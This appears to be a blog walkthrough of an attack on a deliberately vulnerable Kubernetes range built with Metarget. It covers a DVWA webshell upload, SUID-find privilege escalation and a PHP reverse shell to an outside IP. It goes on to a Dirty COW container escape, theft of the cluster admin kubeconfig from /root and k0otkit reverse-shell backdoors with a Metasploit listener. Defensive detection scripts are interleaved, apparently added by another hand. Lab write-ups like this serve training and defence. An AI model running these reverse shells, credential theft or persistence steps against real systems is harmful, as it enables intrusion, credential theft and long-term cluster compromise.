Metarget: a cloud-native attack-and-defence range

Metarget currently supports installation only on Ubuntu 16.04 and 18.04; on 20.04 you may run into dependency problems. Installation is straightforward.
Ubuntu 18.04 is used as the example here:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt

Then run the following command to install a Docker build that carries the CVE-2019-5736 container-escape vulnerability:

sudo ./metarget cnv install cve-2019-5736

Next, run the following command to install a Kubernetes version that carries the CVE-2018-1002105 privilege-escalation vulnerability:

sudo ./metarget cnv install cve-2018-1002105 --domestic

Once the cluster is up, finally run the following command to deploy a containerized DVWA on the cluster:

sudo ./metarget appv install dvwa --external

The whole interaction looks like this:

ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2019-5736
cve-2019-5736 is going to be installed
uninstalling current docker gadgets if applicable
installing prerequisites
adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
installing docker-ce with 18.03.1~ce~3-0~ubuntu version

cve-2019-5736 successfully installed
ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget cnv install cve-2018-1002105 --domestic
docker already installed
cve-2018-1002105 is going to be installed
uninstalling current kubernetes if applicable
pre-configuring
pre-installing
adding apt repository deb https://mirrors.aliyun.com/kubernetes/apt/ kubernetes-xenial main
installing kubernetes-cni with 0.7.5-00 version
installing kubectl with 1.11.10-00 version
installing kubelet with 1.11.10-00 version
installing kubeadm with 1.11.10-00 version
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-proxy-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-controller-manager-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-apiserver-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/kube-scheduler-amd64:v1.11.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/pause:3.1
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/etcd-amd64:3.2.18
pulling registry.cn-hangzhou.aliyuncs.com/google_containers/coredns:1.1.3
running kubeadm
installing cni plugin
installing flannel
pulling quay.mirrors.ustc.edu.cn/coreos/flannel:v0.10.0-amd64
generating kubernetes worker script
kubernetes worker script generated at tools/install_k8s_worker.sh
cve-2018-1002105 successfully installed
ubuntu@VM-8-10-ubuntu:~/metarget-0.5$ sudo ./metarget appv install dvwa --external
docker already installed
kubernetes already installed
dvwa is going to be installed
node port 30000 is allocated for service in vulns_app/dvwa/dvwa/dvwa-service.yaml
applying yamls/k8s_metarget_namespace.yaml
applying vulns_app/dvwa/dvwa/dvwa-deployment.yaml
applying data/dvwa-service.yaml
dvwa successfully installed

Based on the command-line output, we can reach the DVWA service running inside the container directly from a browser:

As you can see, with just three commands we have built a multi-layer target environment.
Cleaning up the environment is equally simple; just run the following commands in order:

./metarget appv remove dvwa
./metarget cnv remove cve-2018-1002105
./metarget cnv remove cve-2019-5736

References: http://blog.nsfocus.net/metarget/
https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw

Log in to DVWA with admin/password and use the file-upload function directly to obtain a webshell.

Upload a Behinder (冰蝎) shell and connect to it to get the webshell; the current privilege is www-data.

Next comes privilege escalation.

Dirty COW privilege escalation: Linux kernels >= 2.6.22 (released in 2007) are affected; the bug was not fixed until 18 October 2016.
Check the distribution release:
cat /etc/issue
cat /etc/*-release
Check the kernel version:
uname -a
SUID misconfiguration privilege escalation:
The following commands try to find SUID files owned by root; different systems need different variants:
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

For ease of testing, I gave find in this environment the SUID bit.

Look up executables with the SUID bit set using the command:

find / -perm -u=s -type f 2>/dev/null

find's -exec option can be used to run arbitrary commands, so a find binary that carries the SUID bit can run commands as root and escalate privileges. We first try running the whoami command through find.

find xxx -exec whoami \;

Next we can use find to run a reverse-shell command:

find shell.php -exec php -r '$sock=fsockopen("42.xxx.xxx.97",8000);exec("/bin/sh -i <&3 >&3 2>&3");' \;

Here, running the reverse-shell command through Behinder always reported an operation failure.

So I uploaded a weevely webshell, and running the reverse shell from the weevely command line succeeded.

Privilege escalation succeeded and we got a shell with root privileges, but it is not a full root shell: its euid is root while its uid is still www-data, which means we have only obtained a temporary root shell.
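The defensive counterpart of the SUID hunt above, added here as an example (not code from the original post): feed the output of GNU find into a baseline comparison so that a stray SUID root binary such as find stands out. The baseline set and the sample listing are constructed assumptions; derive the real baseline from a clean image of the same release.

```python
"""Audit SUID-root binaries against a baseline.

Input is the output of the GNU find invocation
    find / -xdev -perm -4000 -type f -printf '%u %p\n' 2>/dev/null
i.e. one "owner path" pair per line.
"""
import subprocess

# Illustrative baseline for a stock Ubuntu 18.04 host (an assumption for this
# example); build the real one from a freshly installed image.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/su", "/bin/mount",
    "/bin/umount", "/bin/ping",
}

def parse_suid_listing(text):
    """Parse 'owner path' lines into a list of (owner, path) tuples."""
    entries = []
    for line in text.splitlines():
        owner, _, path = line.strip().partition(" ")
        if owner and path:
            entries.append((owner, path))
    return entries

def unexpected_suid(entries, baseline=BASELINE, owner="root"):
    """Return SUID paths owned by `owner` that are missing from the baseline."""
    return sorted(p for o, p in entries if o == owner and p not in baseline)

def collect_suid_listing(root="/"):
    """Run GNU find on the live host and return its output (not exercised by the test)."""
    cmd = ["find", root, "-xdev", "-perm", "-4000", "-type", "f", "-printf", "%u %p\n"]
    return subprocess.run(cmd, capture_output=True, text=True).stdout

# Constructed sample listing: a stock set plus the find binary the post made SUID.
SAMPLE = """root /usr/bin/sudo
root /usr/bin/passwd
root /bin/su
root /bin/mount
root /usr/bin/find
www-data /var/www/html/upload.php
"""

if __name__ == "__main__":
    for path in unexpected_suid(parse_suid_listing(SAMPLE)):
        print("unexpected SUID root binary:", path)
```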

Container detection:
During testing, some commands turned out to be missing from the environment, so we suspected it might be a container. We look for the .dockerenv file and inspect the cgroup to determine whether we are inside a container. The output (kubepods) suggests we are currently inside a k8s pod.

ls -la / | grep dockerenv
cat /proc/1/cgroup

The rough relationship between k8s, pods and containers: a cluster contains many pods, and a pod contains one or more containers.
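The .dockerenv and cgroup checks above, turned into a small classifier as an added example (not from the original post): it parses /proc/1/cgroup lines, reports whether the process runs under Docker or a Kubernetes pod, and extracts the pod UID so an incident responder can map the shell back to a pod with kubectl. The sample cgroup text is constructed.

```python
"""Infer container context from /proc/1/cgroup and /.dockerenv."""
import os
import re

# Pod UID inside a kubepods cgroup path. Handles the cgroup v1 layout
# (/kubepods/besteffort/pod<uid>/...) and the systemd naming
# (kubepods-besteffort-pod<uid with underscores>.slice).
POD_UID_RE = re.compile(
    r"kubepods.*?pod([0-9a-f]{8}(?:[-_][0-9a-f]{4}){3}[-_][0-9a-f]{12})")

def classify_cgroup(cgroup_text, dockerenv_present=False):
    """Return a dict describing the container context inferred from cgroup lines."""
    result = {"in_container": dockerenv_present, "runtime": None, "pod_uid": None}
    for line in cgroup_text.splitlines():
        parts = line.split(":", 2)  # "<hierarchy-id>:<controllers>:<path>"
        if len(parts) != 3:
            continue
        path = parts[2]
        m = POD_UID_RE.search(path)
        if m:
            result.update(in_container=True, runtime="kubernetes",
                          pod_uid=m.group(1).replace("_", "-"))
            break
        if path.startswith("/docker/"):
            result.update(in_container=True, runtime="docker")
    return result

def classify_self():
    """Classify the live process (meaningful only on Linux)."""
    try:
        with open("/proc/1/cgroup") as f:
            text = f.read()
    except OSError:
        text = ""
    return classify_cgroup(text, os.path.exists("/.dockerenv"))

# Constructed sample: what a pod container's /proc/1/cgroup typically looks like.
SAMPLE_CGROUP = """12:pids:/kubepods/besteffort/pod0f3a9c2e-1b4d-4e6f-8a7b-9c0d1e2f3a4b/6d3f1e2a7b9c
11:cpu,cpuacct:/kubepods/besteffort/pod0f3a9c2e-1b4d-4e6f-8a7b-9c0d1e2f3a4b/6d3f1e2a7b9c
1:name=systemd:/kubepods/besteffort/pod0f3a9c2e-1b4d-4e6f-8a7b-9c0d1e2f3a4b/6d3f1e2a7b9c
"""

if __name__ == "__main__":
    print(classify_cgroup(SAMPLE_CGROUP))
```

With the pod UID in hand, `kubectl get pods -A -o jsonpath='{..metadata.uid}'` style lookups identify the pod from the cluster side.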

Container escape:

CVE-2016-5195 Dirty COW:
sudo apt install -y make gcc nasm
git clone https://github.com/scumjr/dirtycow-vdso
cd dirtycow-vdso
make

Run ./0xdeadbeef attacker-ip:port
to get a reverse shell on the host. The process is omitted here because the environment was too laggy and kept crashing.
Using the reverse shell from the host, steal the Kubernetes administrator's access credentials:

ls -al /root | grep kube
cat /root/.kube/config
# ls -al /root | grep kube
drwxr-xr-x  4 root   root   4096 Oct 31 20:26 .kube
# cat /root/.kube/config
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: <base64 CA certificate omitted>
    server: https://10.0.8.10:6443
  name: kubernetes
contexts:
- context:
    cluster: kubernetes
    user: kubernetes-admin
  name: kubernetes-admin@kubernetes
current-context: kubernetes-admin@kubernetes
kind: Config
preferences: {}
users:
- name: kubernetes-admin
  user:
    client-certificate-data: <base64 client certificate omitted>
    client-key-data: <base64 client key omitted>

Save the credentials above into a local kubeconfig file, then try to connect to and inspect the Kubernetes cluster with them:

kubectl --kubeconfig ./kubeconfig get nodes
kubectl --kubeconfig ./kubeconfig get pods

Cluster control + persistence:
k0otkit lets us, once we have control of the cluster's master node, quickly plant stealthy, persistent reverse-shell backdoors on every node of the cluster. Clone the GitHub repository to the attacker's own Linux server (k0otkit depends on Metasploit; both msfvenom and msfconsole must be present on the server), set the attacker IP, then run pre_exp.sh:

git clone https://github.com/brant-ruan/k0otkit
cd k0otkit
chmod u+x ./*.sh
# set the ATTACKER_IP variable in pre_exp.sh to the actual attacker IP
./pre_exp.sh


After the script finishes, a new file k0otkit.sh appears in the directory; it will be used later. Next, run the handle_multi_reverse_shell.sh script, which opens msfconsole and starts a reverse-shell listener module:

┌──(root💀kali)-[~/k0otkit-main]
└─# ./handle_multi_reverse_shell.sh
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444 
msf6 exploit(multi/handler) > 

Then copy the contents of k0otkit.sh into the root shell obtained after the container escape and run it; the attacker's machine receives the session:

k0otkit creates a privileged Pod on every node. The Pod shares the node's network and PID namespaces and mounts the host's root directory at /var/kube-proxy-cache inside the container; the shells received by msfconsole above are the ones bounced back from these privileged Pods. With these de-isolated privileged Pods, controlling the cluster is straightforward.
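The combination just described (hostPID + hostNetwork + privileged container + host root mounted via hostPath) is what a defender should hunt for. The following is an added detection example, not part of k0otkit or the original post: it scans the JSON from `kubectl get pods -A -o json` and reports every pod showing those settings. The pod list below is constructed; the pod and container names are placeholders, not k0otkit's real names.

```python
"""Flag pods that combine host-namespace sharing, privilege and a host root mount."""
import json

def pod_risk_findings(pod):
    """Return the list of risky settings found in one Pod object."""
    spec = pod.get("spec", {})
    findings = []
    if spec.get("hostPID"):
        findings.append("hostPID")
    if spec.get("hostNetwork"):
        findings.append("hostNetwork")
    # Resolve volume names to hostPath sources so mounts can be checked.
    host_paths = {v["name"]: v["hostPath"]["path"]
                  for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"privileged container {c['name']}")
        for m in c.get("volumeMounts", []):
            if host_paths.get(m["name"]) == "/":
                findings.append(f"host root mounted at {m['mountPath']} in {c['name']}")
    return findings

def scan_pod_list(pod_list_json):
    """Scan a PodList document; return {namespace/name: findings} for flagged pods."""
    report = {}
    for pod in json.loads(pod_list_json).get("items", []):
        findings = pod_risk_findings(pod)
        if findings:
            meta = pod["metadata"]
            report[f"{meta['namespace']}/{meta['name']}"] = findings
    return report

# Constructed sample: one de-isolated pod (placeholder names) and one ordinary pod.
SAMPLE_PODLIST = json.dumps({"items": [
    {"metadata": {"namespace": "kube-system", "name": "sample-daemon-abc12"},
     "spec": {"hostPID": True, "hostNetwork": True,
              "volumes": [{"name": "cache", "hostPath": {"path": "/"}}],
              "containers": [{"name": "proxy",
                              "securityContext": {"privileged": True},
                              "volumeMounts": [{"name": "cache",
                                                "mountPath": "/var/kube-proxy-cache"}]}]}},
    {"metadata": {"namespace": "metarget", "name": "dvwa-7d9f"},
     "spec": {"containers": [{"name": "dvwa"}]}},
]})

if __name__ == "__main__":
    for name, findings in scan_pod_list(SAMPLE_PODLIST).items():
        print(name, "->", ", ".join(findings))
```

An admission policy (Pod Security Standards at the restricted or baseline level) blocks these settings before such a pod is ever scheduled; the scan above is for finding ones that already exist.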

posted @ 2021-10-31 12:54  micr067  views (3271)  comments (0)